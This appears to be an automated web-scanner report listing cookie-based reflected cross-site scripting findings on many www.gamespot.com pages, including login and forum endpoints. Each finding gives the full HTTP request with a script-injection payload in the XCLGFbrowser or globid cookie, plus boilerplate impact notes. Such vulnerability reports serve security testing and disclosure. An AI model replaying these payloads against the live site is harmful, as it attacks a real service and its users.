GET /misc/rss/index.html HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; geolocn=MTc0LjEyMS4yMjIuMTg6ODQwOjYxOA%3D%3D; MADTEST=1; hello_from_gs=1; ctk=NGQxZjk0ZjhhZTc5ZGUxMjEyYjIxYWI3ZjQyZg%3D%3D; mad_rsi_segs=; globid=1.17/UmruvRN6MnTHX1eb19"><script>alert(1)</script>e2ab97fd18c; gspot_side_010111=1; post_clc_title=Forum+-+Sony+PlayStation+3+-+How+do+you+erase+playstation+3+online+accounts%3F;
The value of the XCLGFbrowser cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 329d1"><script>alert(1)</script>a48773363b4 was submitted in the XCLGFbrowser cookie. This input was echoed as 329d1\"><script>alert(1)</script>a48773363b4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /misc/worldwide.html HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw329d1"><script>alert(1)</script>a48773363b4; geolocn=MTc0LjEyMS4yMjIuMTg6ODQwOjYxOA%3D%3D; MADTEST=1; hello_from_gs=1; ctk=NGQxZjk0ZjhhZTc5ZGUxMjEyYjIxYWI3ZjQyZg%3D%3D; mad_rsi_segs=; globid=1.17/UmruvRN6MnTHX; gspot_side_010111=1; post_clc_title=Forum+-+Sony+PlayStation+3+-+How+do+you+erase+playstation+3+online+accounts%3F;
The value of the globid cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c20f6"><script>alert(1)</script>1044a4200a5 was submitted in the globid cookie. This input was echoed as c20f6\"><script>alert(1)</script>1044a4200a5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /misc/worldwide.html HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; geolocn=MTc0LjEyMS4yMjIuMTg6ODQwOjYxOA%3D%3D; MADTEST=1; hello_from_gs=1; ctk=NGQxZjk0ZjhhZTc5ZGUxMjEyYjIxYWI3ZjQyZg%3D%3D; mad_rsi_segs=; globid=1.17/UmruvRN6MnTHXc20f6"><script>alert(1)</script>1044a4200a5; gspot_side_010111=1; post_clc_title=Forum+-+Sony+PlayStation+3+-+How+do+you+erase+playstation+3+online+accounts%3F;
The value of the XCLGFbrowser cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5d098"><script>alert(1)</script>64c0c567006 was submitted in the XCLGFbrowser cookie. This input was echoed as 5d098\"><script>alert(1)</script>64c0c567006 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /mobile/index.html HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw5d098"><script>alert(1)</script>64c0c567006; geolocn=MTc0LjEyMS4yMjIuMTg6ODQwOjYxOA%3D%3D; MADTEST=1; hello_from_gs=1; ctk=NGQxZjk0ZjhhZTc5ZGUxMjEyYjIxYWI3ZjQyZg%3D%3D; mad_rsi_segs=; globid=1.17/UmruvRN6MnTHX; gspot_side_010111=1; post_clc_title=Forum+-+Sony+PlayStation+3+-+How+do+you+erase+playstation+3+online+accounts%3F;
The value of the globid cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f8463"><script>alert(1)</script>863c79b76bc was submitted in the globid cookie. This input was echoed as f8463\"><script>alert(1)</script>863c79b76bc in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /mobile/index.html HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; geolocn=MTc0LjEyMS4yMjIuMTg6ODQwOjYxOA%3D%3D; MADTEST=1; hello_from_gs=1; ctk=NGQxZjk0ZjhhZTc5ZGUxMjEyYjIxYWI3ZjQyZg%3D%3D; mad_rsi_segs=; globid=1.17/UmruvRN6MnTHXf8463"><script>alert(1)</script>863c79b76bc; gspot_side_010111=1; post_clc_title=Forum+-+Sony+PlayStation+3+-+How+do+you+erase+playstation+3+online+accounts%3F;
The value of the XCLGFbrowser cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ada65"><script>alert(1)</script>52c73f3f53 was submitted in the XCLGFbrowser cookie. This input was echoed as ada65\"><script>alert(1)</script>52c73f3f53 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /news/index.html HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: XCLGFbrowser=Cg8IMEzjGeJNAAAAqCwada65"><script>alert(1)</script>52c73f3f53; geolocn=MTc0LjEyMS4yMjIuMTg6ODQwOjYxOA%3D%3D; MADTEST=1; hello_from_gs=1; ctk=NGQxZjk0ZjhhZTc5ZGUxMjEyYjIxYWI3ZjQyZg%3D%3D; mad_rsi_segs=; globid=1.17/UmruvRN6MnTHX; gspot_side_010111=1; post_clc_title=Forum+-+Sony+PlayStation+3+-+How+do+you+erase+playstation+3+online+accounts%3F;
The value of the globid cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7b502"><script>alert(1)</script>30a8c748700 was submitted in the globid cookie. This input was echoed as 7b502\"><script>alert(1)</script>30a8c748700 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /news/index.html HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; geolocn=MTc0LjEyMS4yMjIuMTg6ODQwOjYxOA%3D%3D; MADTEST=1; hello_from_gs=1; ctk=NGQxZjk0ZjhhZTc5ZGUxMjEyYjIxYWI3ZjQyZg%3D%3D; mad_rsi_segs=; globid=1.17/UmruvRN6MnTHX7b502"><script>alert(1)</script>30a8c748700; gspot_side_010111=1; post_clc_title=Forum+-+Sony+PlayStation+3+-+How+do+you+erase+playstation+3+online+accounts%3F;
The value of the XCLGFbrowser cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c0911"><script>alert(1)</script>fc16295b2a7 was submitted in the XCLGFbrowser cookie. This input was echoed as c0911\"><script>alert(1)</script>fc16295b2a7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /newthisweek.html HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: XCLGFbrowser=Cg8IMEzjGeJNAAAAqCwc0911"><script>alert(1)</script>fc16295b2a7; geolocn=MTc0LjEyMS4yMjIuMTg6ODQwOjYxOA%3D%3D; MADTEST=1; hello_from_gs=1; ctk=NGQxZjk0ZjhhZTc5ZGUxMjEyYjIxYWI3ZjQyZg%3D%3D; mad_rsi_segs=; globid=1.17/UmruvRN6MnTHX; gspot_side_010111=1; post_clc_title=Forum+-+Sony+PlayStation+3+-+How+do+you+erase+playstation+3+online+accounts%3F;
The value of the globid cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1529a"><script>alert(1)</script>7d7e7c51a66 was submitted in the globid cookie. This input was echoed as 1529a\"><script>alert(1)</script>7d7e7c51a66 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /newthisweek.html HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; geolocn=MTc0LjEyMS4yMjIuMTg6ODQwOjYxOA%3D%3D; MADTEST=1; hello_from_gs=1; ctk=NGQxZjk0ZjhhZTc5ZGUxMjEyYjIxYWI3ZjQyZg%3D%3D; mad_rsi_segs=; globid=1.17/UmruvRN6MnTHX1529a"><script>alert(1)</script>7d7e7c51a66; gspot_side_010111=1; post_clc_title=Forum+-+Sony+PlayStation+3+-+How+do+you+erase+playstation+3+online+accounts%3F;
The value of the XCLGFbrowser cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 54f31"><script>alert(1)</script>56918564cbb was submitted in the XCLGFbrowser cookie. This input was echoed as 54f31\"><script>alert(1)</script>56918564cbb in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /pages/common/login.php HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw54f31"><script>alert(1)</script>56918564cbb; geolocn=MTc0LjEyMS4yMjIuMTg6ODQwOjYxOA%3D%3D; MADTEST=1; hello_from_gs=1; ctk=NGQxZjk0ZjhhZTc5ZGUxMjEyYjIxYWI3ZjQyZg%3D%3D; mad_rsi_segs=; globid=1.17/UmruvRN6MnTHX; gspot_side_010111=1; post_clc_title=Forum+-+Sony+PlayStation+3+-+How+do+you+erase+playstation+3+online+accounts%3F;
The value of the globid cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 655a3"><script>alert(1)</script>077ebded750 was submitted in the globid cookie. This input was echoed as 655a3\"><script>alert(1)</script>077ebded750 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /pages/common/login.php HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; geolocn=MTc0LjEyMS4yMjIuMTg6ODQwOjYxOA%3D%3D; MADTEST=1; hello_from_gs=1; ctk=NGQxZjk0ZjhhZTc5ZGUxMjEyYjIxYWI3ZjQyZg%3D%3D; mad_rsi_segs=; globid=1.17/UmruvRN6MnTHX655a3"><script>alert(1)</script>077ebded750; gspot_side_010111=1; post_clc_title=Forum+-+Sony+PlayStation+3+-+How+do+you+erase+playstation+3+online+accounts%3F;
The value of the XCLGFbrowser cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 943f5"><script>alert(1)</script>be3a29591d3 was submitted in the XCLGFbrowser cookie. This input was echoed as 943f5\"><script>alert(1)</script>be3a29591d3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /pages/facebook/connect/login.php HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw943f5"><script>alert(1)</script>be3a29591d3; geolocn=MTc0LjEyMS4yMjIuMTg6ODQwOjYxOA%3D%3D; MADTEST=1; hello_from_gs=1; ctk=NGQxZjk0ZjhhZTc5ZGUxMjEyYjIxYWI3ZjQyZg%3D%3D; mad_rsi_segs=; globid=1.17/UmruvRN6MnTHX; gspot_side_010111=1; post_clc_title=Forum+-+Sony+PlayStation+3+-+How+do+you+erase+playstation+3+online+accounts%3F;
The value of the globid cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bf736"><script>alert(1)</script>8a818dd2441 was submitted in the globid cookie. This input was echoed as bf736\"><script>alert(1)</script>8a818dd2441 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /pages/facebook/connect/login.php HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; geolocn=MTc0LjEyMS4yMjIuMTg6ODQwOjYxOA%3D%3D; MADTEST=1; hello_from_gs=1; ctk=NGQxZjk0ZjhhZTc5ZGUxMjEyYjIxYWI3ZjQyZg%3D%3D; mad_rsi_segs=; globid=1.17/UmruvRN6MnTHXbf736"><script>alert(1)</script>8a818dd2441; gspot_side_010111=1; post_clc_title=Forum+-+Sony+PlayStation+3+-+How+do+you+erase+playstation+3+online+accounts%3F;
The value of the XCLGFbrowser cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 427ea"><script>alert(1)</script>f4baf41b4a5 was submitted in the XCLGFbrowser cookie. This input was echoed as 427ea\"><script>alert(1)</script>f4baf41b4a5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /pages/forums/post_msg.php HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw427ea"><script>alert(1)</script>f4baf41b4a5; geolocn=MTc0LjEyMS4yMjIuMTg6ODQwOjYxOA%3D%3D; MADTEST=1; hello_from_gs=1; ctk=NGQxZjk0ZjhhZTc5ZGUxMjEyYjIxYWI3ZjQyZg%3D%3D; mad_rsi_segs=; globid=1.17/UmruvRN6MnTHX; gspot_side_010111=1; post_clc_title=Forum+-+Sony+PlayStation+3+-+How+do+you+erase+playstation+3+online+accounts%3F;
The value of the globid cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 680ad"><script>alert(1)</script>cc17198bb0b was submitted in the globid cookie. This input was echoed as 680ad\"><script>alert(1)</script>cc17198bb0b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /pages/forums/post_msg.php HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; geolocn=MTc0LjEyMS4yMjIuMTg6ODQwOjYxOA%3D%3D; MADTEST=1; hello_from_gs=1; ctk=NGQxZjk0ZjhhZTc5ZGUxMjEyYjIxYWI3ZjQyZg%3D%3D; mad_rsi_segs=; globid=1.17/UmruvRN6MnTHX680ad"><script>alert(1)</script>cc17198bb0b; gspot_side_010111=1; post_clc_title=Forum+-+Sony+PlayStation+3+-+How+do+you+erase+playstation+3+online+accounts%3F;
The value of the XCLGFbrowser cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a48b1"><script>alert(1)</script>401f02d848b was submitted in the XCLGFbrowser cookie. This input was echoed as a48b1\"><script>alert(1)</script>401f02d848b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /pages/forums/show_msgs.php HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: XCLGFbrowser=Cg8IMEzjGeJNAAAAqCwa48b1"><script>alert(1)</script>401f02d848b; geolocn=MTc0LjEyMS4yMjIuMTg6ODQwOjYxOA%3D%3D; MADTEST=1; hello_from_gs=1; ctk=NGQxZjk0ZjhhZTc5ZGUxMjEyYjIxYWI3ZjQyZg%3D%3D; mad_rsi_segs=; globid=1.17/UmruvRN6MnTHX; gspot_side_010111=1; post_clc_title=Forum+-+Sony+PlayStation+3+-+How+do+you+erase+playstation+3+online+accounts%3F;
The value of the globid cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a6795"><script>alert(1)</script>1a800c76910 was submitted in the globid cookie. This input was echoed as a6795\"><script>alert(1)</script>1a800c76910 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /pages/forums/show_msgs.php HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; geolocn=MTc0LjEyMS4yMjIuMTg6ODQwOjYxOA%3D%3D; MADTEST=1; hello_from_gs=1; ctk=NGQxZjk0ZjhhZTc5ZGUxMjEyYjIxYWI3ZjQyZg%3D%3D; mad_rsi_segs=; globid=1.17/UmruvRN6MnTHXa6795"><script>alert(1)</script>1a800c76910; gspot_side_010111=1; post_clc_title=Forum+-+Sony+PlayStation+3+-+How+do+you+erase+playstation+3+online+accounts%3F;
The value of the XCLGFbrowser cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a263b"><script>alert(1)</script>a6c1e72039f was submitted in the XCLGFbrowser cookie. This input was echoed as a263b\"><script>alert(1)</script>a6c1e72039f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /pages/forums/show_topics.php HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: XCLGFbrowser=Cg8IMEzjGeJNAAAAqCwa263b"><script>alert(1)</script>a6c1e72039f; geolocn=MTc0LjEyMS4yMjIuMTg6ODQwOjYxOA%3D%3D; MADTEST=1; hello_from_gs=1; ctk=NGQxZjk0ZjhhZTc5ZGUxMjEyYjIxYWI3ZjQyZg%3D%3D; mad_rsi_segs=; globid=1.17/UmruvRN6MnTHX; gspot_side_010111=1; post_clc_title=Forum+-+Sony+PlayStation+3+-+How+do+you+erase+playstation+3+online+accounts%3F;
The value of the globid cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7fe3c"><script>alert(1)</script>46b42868588 was submitted in the globid cookie. This input was echoed as 7fe3c\"><script>alert(1)</script>46b42868588 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /pages/forums/show_topics.php HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; geolocn=MTc0LjEyMS4yMjIuMTg6ODQwOjYxOA%3D%3D; MADTEST=1; hello_from_gs=1; ctk=NGQxZjk0ZjhhZTc5ZGUxMjEyYjIxYWI3ZjQyZg%3D%3D; mad_rsi_segs=; globid=1.17/UmruvRN6MnTHX7fe3c"><script>alert(1)</script>46b42868588; gspot_side_010111=1; post_clc_title=Forum+-+Sony+PlayStation+3+-+How+do+you+erase+playstation+3+online+accounts%3F;
The value of the XCLGFbrowser cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a01b9"><script>alert(1)</script>886ddf3b9f8 was submitted in the XCLGFbrowser cookie. This input was echoed as a01b9\"><script>alert(1)</script>886ddf3b9f8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /pc/index.html HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: XCLGFbrowser=Cg8IMEzjGeJNAAAAqCwa01b9"><script>alert(1)</script>886ddf3b9f8; geolocn=MTc0LjEyMS4yMjIuMTg6ODQwOjYxOA%3D%3D; MADTEST=1; hello_from_gs=1; ctk=NGQxZjk0ZjhhZTc5ZGUxMjEyYjIxYWI3ZjQyZg%3D%3D; mad_rsi_segs=; globid=1.17/UmruvRN6MnTHX; gspot_side_010111=1; post_clc_title=Forum+-+Sony+PlayStation+3+-+How+do+you+erase+playstation+3+online+accounts%3F;
The value of the globid cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b2d4a"><script>alert(1)</script>9b7f84df106 was submitted in the globid cookie. This input was echoed as b2d4a\"><script>alert(1)</script>9b7f84df106 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /pc/index.html HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; geolocn=MTc0LjEyMS4yMjIuMTg6ODQwOjYxOA%3D%3D; MADTEST=1; hello_from_gs=1; ctk=NGQxZjk0ZjhhZTc5ZGUxMjEyYjIxYWI3ZjQyZg%3D%3D; mad_rsi_segs=; globid=1.17/UmruvRN6MnTHXb2d4a"><script>alert(1)</script>9b7f84df106; gspot_side_010111=1; post_clc_title=Forum+-+Sony+PlayStation+3+-+How+do+you+erase+playstation+3+online+accounts%3F;
The value of the XCLGFbrowser cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 170ca"><script>alert(1)</script>0b0993acb51 was submitted in the XCLGFbrowser cookie. This input was echoed as 170ca\"><script>alert(1)</script>0b0993acb51 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /pc/rpg/worldofwarcraft/index.html HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw170ca"><script>alert(1)</script>0b0993acb51; geolocn=MTc0LjEyMS4yMjIuMTg6ODQwOjYxOA%3D%3D; MADTEST=1; hello_from_gs=1; ctk=NGQxZjk0ZjhhZTc5ZGUxMjEyYjIxYWI3ZjQyZg%3D%3D; mad_rsi_segs=; globid=1.17/UmruvRN6MnTHX; gspot_side_010111=1; post_clc_title=Forum+-+Sony+PlayStation+3+-+How+do+you+erase+playstation+3+online+accounts%3F;
The value of the globid cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 46388"><script>alert(1)</script>8cf087220a6 was submitted in the globid cookie. This input was echoed as 46388\"><script>alert(1)</script>8cf087220a6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /pc/rpg/worldofwarcraft/index.html HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; geolocn=MTc0LjEyMS4yMjIuMTg6ODQwOjYxOA%3D%3D; MADTEST=1; hello_from_gs=1; ctk=NGQxZjk0ZjhhZTc5ZGUxMjEyYjIxYWI3ZjQyZg%3D%3D; mad_rsi_segs=; globid=1.17/UmruvRN6MnTHX46388"><script>alert(1)</script>8cf087220a6; gspot_side_010111=1; post_clc_title=Forum+-+Sony+PlayStation+3+-+How+do+you+erase+playstation+3+online+accounts%3F;
